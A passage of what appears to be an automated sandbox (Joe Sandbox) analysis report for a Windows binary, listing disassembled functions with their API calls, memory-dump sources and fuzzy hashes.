Instruction ID: eb7b121d3b246c539ef6b9a5c641b3da53e0ebdf73c289d85364c4e6cbcb2966
Opcode Fuzzy Hash: 2b63518085797411aa97c2cf1592821f7180e5bec554f88f1e083f8cee4e54ec
Instruction Fuzzy Hash: 7021D731241745BFDB119F768C05FBBB7AAFB44710F10801EFA0597691EF7198119B58

Function 006F8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006F88A3
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006F88BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006F88CB
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006F88D9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: cb4c3c350b1d3035d81d396758524700693ba119878fa58b5421f71ae4997666
Instruction ID: 14f11f379c42340bd3414ffd49b190f311b02291208af5a39afa91edb479c4dc
Opcode Fuzzy Hash: cb4c3c350b1d3035d81d396758524700693ba119878fa58b5421f71ae4997666
Instruction Fuzzy Hash: 09117F31345115AFDB54AB28CC15FFA77AEAF86360F148159F926D72E1CB64AC00CB98

Function 006E900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 006E906D
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 006E907F
accept.WS2_32(00000000,00000000,00000000), ref: 006E908C
WSAGetLastError.WS2_32(00000000), ref: 006E90A3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 89238afe9cf05734bedb94dab065249e8eb80e66ee26ccffcb38b0c367353c47
Instruction ID: 2507ad3674dcc1ddddde5cfcd4d5818f5415ad7a940a08e479c6ef71e2beb4c6
Opcode Fuzzy Hash: 89238afe9cf05734bedb94dab065249e8eb80e66ee26ccffcb38b0c367353c47
Instruction Fuzzy Hash: 7E215471A001249FCB20DF69C895ADABBFDEF49710F00C16AF849D7290D6749E41CFA4

Function 006D18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006D2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006D18FD,?,?,?,006D26BC,00000000,000000EF,00000119,?,?), ref: 006D2CB9
Part of subcall function 006D2CAA: lstrcpyW.KERNEL32(00000000,?,?,006D18FD,?,?,?,006D26BC,00000000,000000EF,00000119,?,?,00000000), ref: 006D2CDF
Part of subcall function 006D2CAA: lstrcmpiW.KERNEL32(00000000,?,006D18FD,?,?,?,006D26BC,00000000,000000EF,00000119,?,?), ref: 006D2D10

lstrlenW.KERNEL32(?,00000002,?,?,?,?,006D26BC,00000000,000000EF,00000119,?,?,00000000), ref: 006D1916
lstrcpyW.KERNEL32(00000000,?,?,006D26BC,00000000,000000EF,00000119,?,?,00000000), ref: 006D193C
lstrcmpiW.KERNEL32(00000002,cdecl,?,006D26BC,00000000,000000EF,00000119,?,?,00000000), ref: 006D1970

Strings

cdecl, xrefs: 006D1967

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 912378204f13258b4556192664c5da87c6aec5e71581eeeb23fceff4544dfc5d
Instruction ID: 50f570e032005883bc51557de66132eefa4392f2dc3cf5a35e0ab1af54f00baa
Opcode Fuzzy Hash: 912378204f13258b4556192664c5da87c6aec5e71581eeeb23fceff4544dfc5d
Instruction Fuzzy Hash: 9B11BE76500305BFDB25AF78C865DBA77AAFF45350B40902BF806CF3A0EB71985187A5

Function 006C3D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006C3D65

Part of subcall function 006B45EC: __FF_MSGBANNER.LIBCMT ref: 006B4603
Part of subcall function 006B45EC: __NMSG_WRITE.LIBCMT ref: 006B460A
Part of subcall function 006B45EC: RtlAllocateHeap.NTDLL(011B0000,00000000,00000001), ref: 006B462F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 027ddead51ade219040a8fc78f9d3312a78026ccd6a464572f0684ee96f203ae
Instruction ID: e968032ff4b6793501a48101685916461b694055abf7a4a5589c8e40d1d71fc6
Opcode Fuzzy Hash: 027ddead51ade219040a8fc78f9d3312a78026ccd6a464572f0684ee96f203ae
Instruction Fuzzy Hash: 9B1182725006269FDB713B74A845BF93B9AEF00360B10C52DF94A9B392DF349980CB98

Function 006D713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006D715C
_memset.LIBCMT ref: 006D717D
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006D71CF
CloseHandle.KERNEL32(00000000), ref: 006D71D8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: bf6b47dce1c48cac251399f94edf83ae8b3e063544d5c00c4d19f5a608e94116
Instruction ID: 5dc7a857fff350321cbd17cbcb2f1e1f2424e0d2afe278bbac1895fb33aebdce
Opcode Fuzzy Hash: bf6b47dce1c48cac251399f94edf83ae8b3e063544d5c00c4d19f5a608e94116
Instruction Fuzzy Hash: 3211CD71D012287AD7305765AC4DFDBBA7CEF45760F14429AF504E72D0D2744F808BA9

Function 006D13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006D13EE
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006D1409
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006D141F
FreeLibrary.KERNEL32(?), ref: 006D1474

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 8753fbfa756593095937d6108e3d9619fee75e862f87692de83122e420816775
Instruction ID: 4e426270ef2f4097160223931dc9a2a62c68430fd88a61c24d88bdbc90fdf183
Opcode Fuzzy Hash: 8753fbfa756593095937d6108e3d9619fee75e862f87692de83122e420816775
Instruction Fuzzy Hash: 48219D71900209FBDB209F94ED88ADABBF9EF01700F00846FE5129B250D7B4EA05DF91

Function 006CC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 006CC285
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006CC297
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006CC2AD
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006CC2C8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d085f7cf91774fc48a52218e188bc77e9bb97350f3ff22cfa4f8cef8c50bf527
Instruction ID: 637d766718619c41bd00ce501b3fc3801d408ab82ffdbbe8c1f8393b1bb51930
Opcode Fuzzy Hash: d085f7cf91774fc48a52218e188bc77e9bb97350f3ff22cfa4f8cef8c50bf527
Instruction Fuzzy Hash: 5F11187A940218FFDB11DBE8C885FDDBBB5FB08750F204095EA05B7294D671AE10DB94

Function 006D7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006D7C6C
MessageBoxW.USER32(?,?,?,?), ref: 006D7C9F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006D7CB5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006D7CBC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 725fdb6a45ba2538a142c51ef686fb466bc0ffbe2c2302a088c018cd4f244861
Instruction ID: 243fd5275c5d7a15f0ca615bf845e9e60222f6df12e2af097afd6d648de3041f
Opcode Fuzzy Hash: 725fdb6a45ba2538a142c51ef686fb466bc0ffbe2c2302a088c018cd4f244861
Instruction Fuzzy Hash: 61110C72A04244BFC7519B6C9C08ADE7FAE9B44355F148216F515D3390D6B48D048769

Function 006AC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006AC657
GetStockObject.GDI32(00000011), ref: 006AC66B
SendMessageW.USER32(00000000,00000030,00000000), ref: 006AC675

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 25bf4b28cc4bc84fe3bf4924ef989ea77b48f9a1353a1c4822d25d6bfe5cca40
Instruction ID: 3e4dab9feecce6aa3b83d4e2326cf3a9d6f283628aa7782c75a8789d1e7333c4
Opcode Fuzzy Hash: 25bf4b28cc4bc84fe3bf4924ef989ea77b48f9a1353a1c4822d25d6bfe5cca40
Instruction Fuzzy Hash: 5511C472501648FFDF229FA48C54EEA7B6AFF0A364F059211FA0452150C735DC60EFA4

Function 006D49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006D354D,?,006D45D5,?,00008000), ref: 006D49EE
Sleep.KERNEL32(00000000,?,?,?,?,?,?,006D354D,?,006D45D5,?,00008000), ref: 006D4A13
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006D354D,?,006D45D5,?,00008000), ref: 006D4A1D
Sleep.KERNEL32(?,?,?,?,?,?,?,006D354D,?,006D45D5,?,00008000), ref: 006D4A50

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 31032f0a8037b2fa2c46954b1740c9aee0b7a809f5350d07a0e29fc5df79164d
Instruction ID: acb829865dbf4b98b6f9f2b462e2ca6149a5b7de8a2607afac5e53434e307034
Opcode Fuzzy Hash: 31032f0a8037b2fa2c46954b1740c9aee0b7a809f5350d07a0e29fc5df79164d
Instruction Fuzzy Hash: EC115A31D4052CEBCF00AFA5DA88AEEBB75FF09751F058056E945B6284CF349D50CBA9

Function 006C5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 006C5BC6

Part of subcall function 006C62A5: __fltout2.LIBCMT ref: 006C62CE

__cftog_l.LIBCMT ref: 006C5BEC
__cftoe_l.LIBCMT ref: 006C5C1E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 0480b0618f5878d4c96de6d8583110b6e1a99d1d5e029ed71e23eb5073d708e5
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 22017B3600064EBBCF125E84DC51DEE3F23FF18350B588819FA1959131C236DAB2AB85

Function 006B80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B869D: __getptd_noexit.LIBCMT ref: 006B869E

__lock.LIBCMT ref: 006B811F
InterlockedDecrement.KERNEL32(?), ref: 006B813C
_free.LIBCMT ref: 006B814F
InterlockedIncrement.KERNEL32(011D6850), ref: 006B8167

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: b93884e8f94b265dd19d0aff5e7527bb4bc886bc8ceea23a0e606f19dc46c9c5
Instruction ID: bf31a093382535fc1a9d9ee5b792ed1bfc068f6296ae978fb41407cfae5f9b06
Opcode Fuzzy Hash: b93884e8f94b265dd19d0aff5e7527bb4bc886bc8ceea23a0e606f19dc46c9c5
Instruction Fuzzy Hash: 7001A1B1902622AFDB51AF6898067DD736ABF06710F044119F41067391DF285882CBDA

Function 006FDDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006FDE07
ScreenToClient.USER32(?,?), ref: 006FDE1F
ScreenToClient.USER32(?,?), ref: 006FDE43
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006FDE5E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ef7a02a4492fbdde208a0ec7824410a2420e5d7fcd5ed8cbd5272ac03f5241c4
Instruction ID: ea26079b008e8205c1463a908b3c112cfc2f0309c672cb14d40fe33c3a29e393
Opcode Fuzzy Hash: ef7a02a4492fbdde208a0ec7824410a2420e5d7fcd5ed8cbd5272ac03f5241c4
Instruction Fuzzy Hash: CC115DB9D00209EFDB01DFA8C8849EEBBF9FB08350F108166E925E3250D735AA54CF50

Function 006B8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 006B8768

Part of subcall function 006B8984: __mtinitlocknum.LIBCMT ref: 006B8996
Part of subcall function 006B8984: RtlEnterCriticalSection.NTDLL(006B0127), ref: 006B89AF

InterlockedIncrement.KERNEL32(DC840F00), ref: 006B8775
__lock.LIBCMT ref: 006B8789
___addlocaleref.LIBCMT ref: 006B87A7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: d01282e99ca7d9eb1d29b4a2268444daa51429a43693a282f59df56a7372c03f
Instruction ID: 31ec17952a6826258a21ffae1560b741be27c3245968a4578dbb2a0989e26908
Opcode Fuzzy Hash: d01282e99ca7d9eb1d29b4a2268444daa51429a43693a282f59df56a7372c03f
Instruction Fuzzy Hash: 0D015BB1440B00AED7A0AF65D805799B7F5EF40725F20891EE499872A1CF74A680CB0A

Function 006D9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 006D9C7F

Part of subcall function 006DAD14: _memset.LIBCMT ref: 006DAD49

_memmove.LIBCMT ref: 006D9CA2
_memset.LIBCMT ref: 006D9CAF
RtlLeaveCriticalSection.NTDLL(?), ref: 006D9CBF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 44e916087bd56510a9693a58411b714f6e8aabd2ea144740c790c0908315c16c
Instruction ID: 2b362527d0d5219c39b053faf812161aa27b023b54106813242c83f7b74d467a
Opcode Fuzzy Hash: 44e916087bd56510a9693a58411b714f6e8aabd2ea144740c790c0908315c16c
Instruction Fuzzy Hash: 4CF03076200000BBCB416F54DC85A99BB6AEF45350B04C056FE085F257C775EC11DBB9

Function 006FE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006AB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 006AB5EB
Part of subcall function 006AB58B: SelectObject.GDI32(?,00000000), ref: 006AB5FA
Part of subcall function 006AB58B: BeginPath.GDI32(?), ref: 006AB611
Part of subcall function 006AB58B: SelectObject.GDI32(?,00000000), ref: 006AB63B

